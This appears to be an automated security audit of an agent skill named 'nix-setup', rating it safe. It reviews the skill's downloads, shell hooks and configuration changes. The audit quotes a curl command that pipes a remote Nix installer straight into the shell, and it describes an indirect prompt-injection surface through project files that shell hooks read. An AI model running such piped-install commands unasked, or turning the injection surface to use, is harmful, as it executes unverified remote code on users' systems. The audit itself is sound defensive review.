nix-setup
Pass
Audited by Gen Agent Trust Hub on Apr 20, 2026
Risk Level: SAFEEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: Fetches system software and tools from verified official repositories and trusted organizations.
- Downloads Nix binary tarballs from the official NixOS release server (
releases.nixos.org) inside thesetup_nix.shscript. - Fetches the Agent Package Manager (
apm) binaries from Microsoft's official GitHub releases viafetchurlinassets/apm.nix. - [REMOTE_CODE_EXECUTION]: Provides instructions to install the Nix package manager by piping a script from Determinate Systems directly into the shell.
- Evidence:
curl --proto '=https' --tlsv1.2 -sSf -L https://install.determinate.systems/nix | sh -s -- installinSKILL.md. - [COMMAND_EXECUTION]: Performs environment configuration and tool initialization through shell scripts and Nix shell hooks.
- The
assets/setup_nix.shscript modifies system-wide and user-specific Nix configuration files (nix.conf) and shell profiles (/etc/profile.d/nix.sh) to enable flakes and set up the environment. - Language-specific templates (
flake.nix) use shell hooks to automatically execute commands such asopam init(OCaml) andmoon update(MoonBit) when entering the development shell. - Employs
home-managermodules to declaratively manage user configurations including shell aliases, git settings, and local package installations. - [PROMPT_INJECTION]: Contains a surface for indirect instruction injection via automated shell hooks that process local project files.
- Ingestion points: Automatically processes local files like
moon.mod.json(MoonBit) andrust-toolchain.toml(Rust) inflake.nixshell hooks. - Boundary markers: None present.
- Capability inventory: Shell hooks can execute arbitrary commands via the
nix developcommand during environment activation. - Sanitization: No sanitization is performed on the project-local files before they are used as inputs to automated setup tools.
Audit Metadata